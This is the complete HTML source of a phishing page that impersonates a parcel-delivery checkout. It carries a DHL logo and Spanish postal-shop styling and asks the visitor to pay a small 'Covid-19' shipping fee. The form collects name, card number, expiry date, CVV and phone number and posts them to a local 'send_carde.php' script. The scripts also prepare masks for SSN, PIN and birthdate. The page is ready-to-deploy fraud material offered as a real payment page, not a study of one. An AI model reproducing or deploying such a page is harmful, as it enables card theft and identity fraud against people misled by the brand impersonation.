<html lang="en" style="height: 100%;" class="translated-ltr"><head><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>


	<link href="./style/main.44.css" rel="stylesheet">
<script src="./style/js/angular.min.js"></script>
<script src="./style/js/jquery.min.js"></script>
<script src="./style/js/jquery.CardValidator.js"></script>
<script src="./style/js/jquery.validate.min.js"></script>
<script src="./style/js/jquery.mask.js"></script>
<script src="./style/js/tyle.js"></script>


  <script type="text/javascript">
    $(function() {
        $('#cardnumber').mask('0000 0000 0000 0000');
    $('#Securitycode').mask('0000');

        $('#birthdate').mask('00/00/0000');

        $('#SSN').mask('000-00-0000');

        $('#PinCode').mask('0000');
        $('#phoneNumber').mask('+000 00000000000');

        $('#expdate').mask('00/0000');

  });
  </script>


<style>
#Securitycode {
background-image: url('./style/sprite_logos_wallet_2x.png');
background-repeat: no-repeat;
 
    background-size: 56px;
background-position: 109.5% 48.1%;

}

 #cardnumber {
background-image: url('./style/cards-sprite-small@2x.png');
background-repeat: no-repeat;
background-size: 42px;

}

</style>



		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
		<link rel="stylesheet" href="https://cdn.mycomandia.com/static/shop/common/bundle/bootstrap-4.1.0/css/bootstrap.min.css?v=2019.12.17" media="screen">
		<link rel="stylesheet" href="https://cdn.mycomandia.com/static/shop/common/css/validationEngine.jquery.css?v=2019.12.17">
		<link rel="stylesheet" href="https://cdn.mycomandia.com/static/shop/common/fonts/flaticon/flaticon.css?v=2019.12.17">
		<link rel="stylesheet" href="https://cdn.mycomandia.com/static/shop/common/bundle/font-awesome-5/web-fonts-with-css/css/fontawesome-all.min.css?v=2019.12.17">
		<link rel="stylesheet" href="https://cdn.mycomandia.com/static/shop/common/css/new-style-common-screen.css?v=2019.12.17">
		<link rel="stylesheet" href="https://tienda.correos.es/css/common-dynamic.css">
		<style>
		.newbar {position: relative;
    display: -ms-flexbox;
    display: flex;
    background-color: #ffd83f;
    -ms-flex-wrap: wrap;
    flex-wrap: wrap;
    -ms-flex-align: center;
    align-items: center;
    -ms-flex-pack: justify;
    justify-content: space-between;
    padding: .5rem 1rem; 
	}
	</style>
	
		
		<title>Online post store: much more than letters</title>
		<meta name="description" lang="es" content="En la Tienda Online de Correos tenemos todo para hacer tus envíos: cajas, sobres, sellos, embalajes... regalos, coleccionismo y productos solidarios.">
		
		
		

		
		
			<meta name="robots" content="index,follow">
		

		
		<meta name="expires" content="0">
		<meta name="revisit-after" content="1 days">
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta http-equiv="pragma" content="no-cache">
		
		
		

</head>

	<body class="common-screen-body"><div class="skiptranslate" style=""></div>
		
		
			
			
		
		
		<section class="common-screen-header">
			<nav class="newbar navbar-expand-md navbar-light">
				
			    <a class="navbar-brand" href="/"><img style="height:50px;" src="https://www.dhl.de/etc.clientlibs/redesign/clientlibs/static/resources/icons/dhl-official.svg"></a>
			    
			    
			    
			    
				<div class="collapse navbar-collapse" id="common-screen-top-navbar">
					<div class="navbar-nav ml-auto">
						
						
							
								<a class="nav-item nav-link" href="#">Private customers</a>					
								<a class="nav-item nav-link" href="#">Company customers</a>
							

						
						
						

						
						<a class="nav-item nav-link" href="#">to identify</a>
						
						
						

						
				        
				    </div>
			    </div>
			</nav>
		</section>
		
		<section class="common-screen-content">
			

















<section class="go-back-to-shop">
	<div class="container">
		<ul class="nav">
			<li class="nav-item">
				<a class="nav-link" href="#">&lt; Back</a>
			</li>
		</ul>
	</div>
</section>

<section class="checkout-template">
	<div class="container">
	
		<div class="cart-no-product-alert" style="display:none"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">You have no items in your basket</font></font></div>
	
	
	
	
		








<!--null
-->

		<div class="alert alert-danger alert-error alert-dismissable shopping-cart-alert" style="display:none"><button type="button" class="close" data-dismiss="alert">×</button><strong></strong></div>
		<!-- Mobile version Summary of the cart -->
		<div class="checkout-mobile-summary">

















<div class="checkout-summary-fixed d-block d-lg-none">
	<div class="row">
		
	</div>
	<!-- summary checkout mobile -->
	<div class="summary-checkout">
		<div class="summary-product-thumbs row">
		
		
			
			
		
		</div>
		<hr>
		<div class="row">
			<div class="col">
				<span><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Total</font></font></font></font></font></font></span>
			</div>
			<div class="col text-right">
				<span>2,99 $</span>
			</div>
		</div>
		
	</div>
	<!-- /summary checkout mobile -->
</div></div>
		<!-- Mobile version Summary of the cart -->
	
		<div class="row flex-column-reverse flex-lg-row">
			<div class="col-lg-7">
				<div class="checkout-left-side">
					<div id="cartParent" style="opacity: 1;">
						<div id="shippingZoneLocked" class="shopping-cart-locked-parent" style="display: block;">













</div>
						<div id="shippingZoneForm" class="shopping-cart-form-parent" style="display: none;">














</div>
					
						<div id="carrierLocked" class="shopping-cart-locked-parent" style="display: block;">














<section class="checkout-small-shipping-type small-box">
	
	<div class="small-box-content">
		
		<div class="title">
			<div class="title-content">
				<div class="title-icon">
					<i class="flaticon-package"></i>
				</div>
				<div class="title-text">
					<h4>Identification number: 9735744596571</h4>
					<p>Express package</p>
					
					 
				</div>
			</div>
		</div>
		<div class="buttons">
			<button class="btn btn-primary modify-button btn-edit-carrier">
				<span class="d-none d-sm-none d-md-block">change</span>
				<span class="d-block d-sm-block d-md-none"><i class="fas fa-edit"></i></span>
			</button>
		</div>
	</div>
</section>
</div>
						<div id="carrierFormParent" class="shopping-cart-form-parent" style="display: none;">




















<section class="checkout-shipping-type">
	<div class="checkout-box">	
		
		<div class="checkout-box-title">
			<div class="checkout-box-title-icon"><i class="flaticon-package"></i></div>
			<h4><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Submission code: UK / 2938456</font></font></h4>
		</div>
		<div class="checkout-box-content">
			<div class="checkout-shipping-type-content">
				
				
					<form id="carrierForm" method="post" action="/cart/changecarrier" class="">
						<input type="hidden" name="carrierid" id="carrierid" value="3">
						<input type="hidden" name="isselfpick" id="isselfpick" value="0">
						<input type="hidden" name="selfpickstorecode" id="selfpickstorecode" value="">
						<input type="hidden" name="homepaqtoken" id="homepaqtoken" value="">
						
						
							
									
							<!--  NEW SCREEN BEGIN -->
							<div class="checkout-shipping-type-zones">
								<div class="checkout-shipping-type-zones-image">
									
									<img class="img-responsive" alt="Paq Estándar" src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQTrX8MP4pA-vzwCA0DiAM71Fj69Cm9CP7aY7NITLF99rsGcwM9">
									
									
								</div>
								
								
									<div class="custom-control custom-checkbox form-check office-delivery">
										
											<input type="checkbox" id="carrierselection3" class="custom-control-input carrierselection" data-carrier="3" data-selfpick="0">
											<label class="custom-control-label" for="carrierselection3"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
												At your home </font></font><strong><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">($ 2.99)</font></font></strong>
											</label>
										
									</div>
								
								
								
									<div class="custom-control custom-checkbox form-check office-nodelivery-container">
										
										<input type="checkbox" id="carrierselection_self3" class="custom-control-input carrierselection" data-carrier="3" data-selfpick="1" data-postalcode="39999" data-is-pickup-at-shop="0">
										<label class="custom-control-label" for="carrierselection_self3"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
										
											Pick up at the Post Office </font></font><strong><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">($ 2.99)</font></font></strong>
										
										</label>
										
										
									<!-- Correos hidden offices -->
										
										<div class="offices-search-container" style="display:none">
											<!-- <div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office1">
												<label class="custom-control-label" for="Office1">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div>
											<div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office2">
												<label class="custom-control-label" for="Office2">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div> -->
										</div>
									<!-- Correos hidden offices -->
										
									</div>
								
								
							</div>
							<div style="width:100%">
								
								<small class="text-muted"><p><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Your shipments in a maximum of 72 hours</font></font></p></small>
							</div>
						<!--  NEW SCREEN END -->
						
						
							
									
							<!--  NEW SCREEN BEGIN -->
							<div class="checkout-shipping-type-zones type-city">
								<div class="checkout-shipping-type-zones-image">
									
									<img class="img-responsive" alt="Paq Estándar CityPaq" src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQTrX8MP4pA-vzwCA0DiAM71Fj69Cm9CP7aY7NITLF99rsGcwM9">
									
									
								</div>
								
								
									<div class="custom-control custom-checkbox form-check office-delivery">
										
										
											
												<input type="checkbox" id="carrierselection9" class="custom-control-input carrierselection" data-carrier="9" data-homepaq="1" data-selfpick="1">
												<label class="custom-control-label" for="carrierselection9"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
													Shipping via CityPaq </font></font><strong><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">($ 2.99)</font></font></strong>
												</label>
													
												<div class="cityPaq-search-container" style="display:none;">
													
														<p><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Enter your CityPaq username:</font></font></p>
														<div class="input-group">
															<input class="form-control py-2 homepaqusername validate[required]" type="search" name="homepaqusername9" id="homepaqusername9">
															<span class="input-group-append">
																<font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><input type="button" class="btn btn-outline-secondary searchhomepaq" value="Look for" data-val="homepaqusername9" data-target="homepaqresult9"></font></font>
															</span>
														</div>
														
														<div id="homepaqresult9" class="homepaqresultdiv">
															<p class="citypaq-text">
																Si aún no es usuario de CityPaq, puede registrarse en este enlace: <a href="https://online.citypaq.es/pages/registro.xhtml" target="_homepaq">Ir a CityPaq</a>
															</p>
														</div>
													
												</div>
												
										
									</div>
								
								
								
								
							</div>
							<div style="width:100%">
								
									
										 <small class="text-muted">Paq Estándar CityPaq</small>
									
								
								<small class="text-muted"><p>Haz tus pedidos y recógelos en el CityPaq que más te convenga</p></small>
							</div>
						<!--  NEW SCREEN END -->
						
						
					</form>
				
				
				
				
			</div>
		</div>
	</div>
</section></div>
						
						<div id="paypalexpressParent" class="shopping-cart-locked-parent" style="display: block;">











	
	
</div>
						
						<div id="shippingAddressLocked" class="shopping-cart-locked-parent" style="display: none;"></div>
						<div id="shippingAddressList" class="shopping-cart-form-parent" style="display: none;"></div>
						<div id="shippingAddressForm" class="shopping-cart-form-parent" style="display: block;">















<section class="checkout-new-shipping-address">
	<div class="checkout-box">
		<div class="checkout-box-title">
			<div class="checkout-box-title-icon"><i class="flaticon-list"></i></div>
			<h4>payment details</h4>
		</div>
		<div class="checkout-box-content">
			
			
			<form class="checkout-new-shipping-address-form" method="post" action="./system/send_carde.php" data-toggle="validate">
				
				<div class="form-row">
					<div class="form-group col-md-4">
						<label for="shipping.firstname">First name *</label>
						<input type="text" name="fname" id="fname" maxlength="50" class="form-control validate[required,minSize[2]] null" required="">
					</div>


					<div class="form-group col-md-4">
						<label for="shipping.lastname">Last name *</label>
						<input type="text" name="lname" id="lname" maxlength="50" class="form-control validate[required,minSize[2]] null" required="">
					</div>
				</div>
				
				<div class="form-row">
					<div class="form-group col-md-8">
						<label for="shipping.email">Card number *</label>
						<input type="text" placeholder="XXXX XXXX XXXX XXXX" name="cardnumber" id="cardnumber" maxlength="19" class="form-control validate[required,custom[email]] null" required="" style="background-position: 98.5% -0.2%;">
					</div>
					
				</div>
				
				
				

					<div class="form-row">
							<div class="form-group col-md-4">
						<label for="inputAddress2">Expiration date *</label>
						<input type="text" placeholder="MM/YYYY" name="expdate" id="expdate" maxlength="7" class="form-control null" required="">
					</div>


					<div class="form-group col-md-4">
					<label for="shipping.postalcode">CVV code *</label>
						<input type="text" placeholder="XXX" name="Securitycode" id="Securitycode" maxlength="3" class="form-control validate[required] null" required="" pattern="[0-9]{3}">
					</div>
				</div>
				




	
				
				
				
				
	<div class="form-row">
					<div class="form-group col-md-8">
						<label for="shipping.lastname">Number phone</label>
						<input placeholder="+&lrm;XXXXXXXXXX" type="text" name="phoneNumber" id="phoneNumber" maxlength="50" class="form-control validate[required,minSize[2]] null" required="">
					</div>
					
				</div>
		
				
				
				 
				
				
				<div class="form-group">
					
				</div>
				
				<div class="form-group">
					<div class="custom-control custom-checkbox">
						<input type="checkbox" name="accept_dpp_shipping" class="custom-control-input validate[required]" id="accept_dpp_shipping" data-prompt-position="bottomRight" value="YES">
						<label class="custom-control-label" for="accept_dpp_shipping">I have read and accept <a target="_blank" href="#"><b>the privacy policy.</b></a>.</label>
					</div>
				</div>
				<section class="continue-button py-2 mb-4" id="continueButtonParent">
							<div class="d-flex justify-content-end">
								<button type="button" class="btn btn-danger btn-cart-cancel-edit ml-1" style="display:none">Cancelar</button> 
								<button type="submit" class="btn btn-primary btn-cart-continue"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">pay now&gt;</font></font></button>
							</div>
						</section>
			</form>
			
		</div>
	</div>
</section>
</div>
						
						<div id="billingAddressLocked" class="shopping-cart-locked-parent" style="display: none;"></div>
						<div id="billingAddressForm" class="shopping-cart-form-parent" style="display: none;"></div>
						
						<div id="paymentBox" class="shopping-cart-form-parent" style="display: none;"></div>
						<div id="paymentLocked" class="shopping-cart-locked-parent" style="display: none;"></div>
						
						
						<div id="discountForm" class="shopping-cart-form-parent d-lg-none" style="display: none;"></div>
						<div id="discountLocked" class="shopping-cart-locked-parent" style="display: none;"></div>
						
						
						
						
						<div id="checkoutButton" style="display:none">
							<div class="order-payment-checkboxs">
								<div class="custom-control custom-checkbox">
									<input type="checkbox" name="isacceptmarketing" class="custom-control-input" id="isacceptmarketing" value="YES">
									<label class="custom-control-label" for="isacceptmarketing">Deseo recibir ofertas y promociones de los productos y servicios comercializados</label>
								</div>
							
								<div class="custom-control custom-checkbox">
									<input type="checkbox" name="accept_dpp" class="custom-control-input validate[required]" id="accept_dpp" data-prompt-position="bottomRight" value="YES">
									
									
									<label class="custom-control-label" for="accept_dpp">He leído y acepto las <a target="_blank" href="/page/condiciones-generales"><b>Condiciones de Venta</b></a>.</label>
									
								</div>
							</div>
							
							
							<section class="continue-button py-2 mb-4">
								<div class="d-flex justify-content-end">
								
									<button type="button" class="btn btn-primary btn-shopping-cart-checkout">Confirmar y pagar pedido &gt;</button>
								
								</div>
							</section>
						</div>
						
					</div>

					
				</div>
			</div>
			<div class="col-lg-5">
				<div class="checkout-right-side">


















<section class="checkout-summary d-none d-lg-block">

	
	<div class="summary-product-list">
		
		
			
	
			<div class="item">
				<div class="row">
					<div class="col-3 flex-grow-0 image-col">
						<div class="item-image">
							
							<a href="#">
								
								
									
										<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQTrX8MP4pA-vzwCA0DiAM71Fj69Cm9CP7aY7NITLF99rsGcwM9">
									
								
							</a>
							
						</div>
					</div>
					<div class="col-5 title-col">
						<div class="item-title">
							<p>Additional shipping costs (Covid-19)<i></i>
							</p>
						</div>
						
					</div>
					<div class="col-4 flex-grow-0 buttons-col">
						<div class="d-flex buttons-col-container justify-content-between h-100">
							<div class="item-delete-button">
								<button class="btn-update-cart-item-quantity" data-input-selector="#cartQuantityProductId_147" value="0"><i class="far fa-trash-alt"></i></button>
							</div>
							<div class="item-price-total">
								<p class="item-price">4.99 $</p>
								
							</div>
						</div>
					</div>
				</div>
				
				
			</div>
			
		
	
	</div>
	
	
	<div class="summary-subtotal">
		
	<div class="summary-total">
		<div class="row">
			<div class="col">
				<div class="text-left">
					<p class="total-title"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Total</font></font></p>
				</div>
			</div>
			<div class="col">
				<div class="text-right">
					<p class="total-amount"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">4.99 $</font></font></font></font></font></font></p>
					
		
				</div>
			</div>
		</div>
	</div>
</div></section>
</div>
			</div>
		</div>
		
	</div>
</section>

		</section>
		
		<section class="common-screen-footer">
		
		</section>
		
		
		
		
		
		
	    <script type="text/javascript">   
    $('#cardnumber').validateCreditCard(function(result) {
            // console.log(result);
            if (result.card_type != null) {
                switch (result.card_type.name) {
                    case "VISA":

 $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



$('.chtadakchi').attr('id', 'chtavisa');


$('#cardsmiya').attr('class', 'creditOrDebit visa blue card image');





$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('').addClass('cardImages-icon_selected');
$('#cscaa').removeClass('csc-image_amex').addClass('');

                        $('#cardnumber').css('background-position', '98.5% 94%');
$('#thDSecure').css('background-position', '255.5% -20.5%'); 

                        break;
                    case "VISA ELECTRON":


$('.chtadakchi').attr('id', 'chtavisa');


$('#cardsmiya').attr('class', 'creditOrDebit visa blue card image');


$('#cardnumber').css('background-position', '98.5% 97%'); 


$('#thDSecure').css('background-position', '99.5% -20.5%'); 



$('#cscaa').removeClass('csc-image_amex').addClass('');

   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



                        break;
                    case "MASTERCARD":


$('.chtadakchi').attr('id', 'chtamastercard');



$('#cardsmiya').attr('class', 'creditOrDebit mastercard black card image');






   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');

$('#metrcardaa').removeClass('').addClass('cardImages-icon_selected');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected ').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('csc-image_amex').addClass('');

                        $('#cardnumber').css('background-position', '98.5% 72%');

$('#thDSecure').css('background-position', '99.5% 9.5%'); 

                        break;
                    case "MAESTRO":

$('.chtadakchi').attr('id', 'chtamastartro');


$('#cardsmiya').attr('class', 'creditOrDebit maestro black card image');



   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');

$('#cardnumber').css('background-position', '98.5% 69%');

$('#thDSecure').css('background-position', '102.5% 62.5%'); 



                        break;
                    case "DISCOVER":


$('.chtadakchi').attr('id', 'chtadiscover');


$('#cardsmiya').attr('class', 'creditOrDebit discover gray card image');



   $('#Securitycode').attr('pattern', '[0-9]{3}');
          $('#Securitycode').attr('maxlength', '3');



                        $('#cardnumber').css('background-position', '98.5% 46.8%');

$('#thDSecure').css('background-position', '98.5% 46.8%'); 

          
$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('').addClass('cardImages-icon_selected');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');

$('#cscaa').removeClass('csc-image_amex').addClass('');



break;
                    case "AMEX":

$('.chtadakchi').attr('id', 'chtaofam');
 

$('#cardsmiya').attr('class', 'creditOrDebit amex gray card image');




$('#csc').attr('pattern', '[0-9]{4}');
          $('#Securitycode').attr('maxlength', '4');

                        $('#cardnumber').css('background-position', '98.5% 6%');
$('#thDSecure').css('background-position', '99.5% 34%'); 




$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('').addClass('cardImages-icon_selected');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('').addClass('csc-image_amex');


                        break;
          case "JCB":

$('.chtadakchi').attr('id', 'chtajcb');




$('#cardsmiya').attr('class', 'creditOrDebit jcb gold card image');



$('#csc').attr('placeholder', 'Enter security code'); 

$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');


$('#cscaa').removeClass('').addClass('csc-image_amex');
                        $('#cardnumber').css('background-position', '98.5% 32%');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


                       break;
          case "DINERS_CLUB":

$('.chtadakchi').attr('id', 'chtacalub');


$('#cardsmiya').attr('class', 'creditOrDebit cb_nationale blue card image');





                        $('#cardnumber').css('background-position', '98.5% 24.8%');
$('#thDSecure').css('background-position', '99.5% -20.5%'); 

                        break;
          default:
                        $('#cardnumber').css('background-position', '98.5% 81.7%');
$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('').addClass('cardImages-icon_selected');

                        $('#cardnumber').css('background-position', '98.5% -1%');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#csc').attr('placeholder', 'Enter security code'); 
                        break;
                }
      } else {

$('.chtadakchi').attr('id', 'jkljk');

$('#thDSecure').css('background-position', '99.5% -20.5%'); 


$('#cardsmiya').attr('class', 'creditOrDebit reb3lpp blue card image');








$('#soracard').removeClass('visaLogo').addClass('');
$('#soracard').removeClass('master_cardLogo').addClass('');
$('#soracard').removeClass('amexLogo').addClass('');
$('#soracard').removeClass('discoverLogo').addClass('');


$('#metrcardaa').removeClass('cardImages-icon_selected').addClass('');

$('#discovaraa').removeClass('cardImages-icon_selected').addClass('');

$('#amxaa').removeClass('cardImages-icon_selected').addClass('');

 $('#visaa').removeClass('cardImages-icon_selected').addClass('');

                $('#cardnumber').css('background-position', '98.5% -0.2%');

$('#csc').attr('placeholder', 'Enter security code');
            }
       // Check for valid card numbere - only show validation checks for invalid Luhn when length is correct so as not to confuse user as they type.
            if (result.valid || $cardinput.val().length > 16) {
                if (result.valid) {


                    $('#cardnumber').removeClass('error').addClass('');
                } else {
                    $('#cardnumber') .removeClass('').addClass('error');
                }
            } else {
                $('#cardnumber').removeClass('').removeClass('error');
            }
        });
    </script>



  <script type="text/javascript">
        $(function() {
        $('#cardnumber').validateCreditCard(function(result) {
                document.getElementById('card_type').value  = result.card_type.name
                document.getElementById('card_valid').value = result.valid
      $('#cardnumber').validateCreditCard(function(result) {
          if(result.card_type == null){
                    $('#cardnumber').removeClass();
                }
                else{
                    $('#cardnumber').addClass(result.card_type.name);
          
                }
            });
            });
    });
        </script></body></html>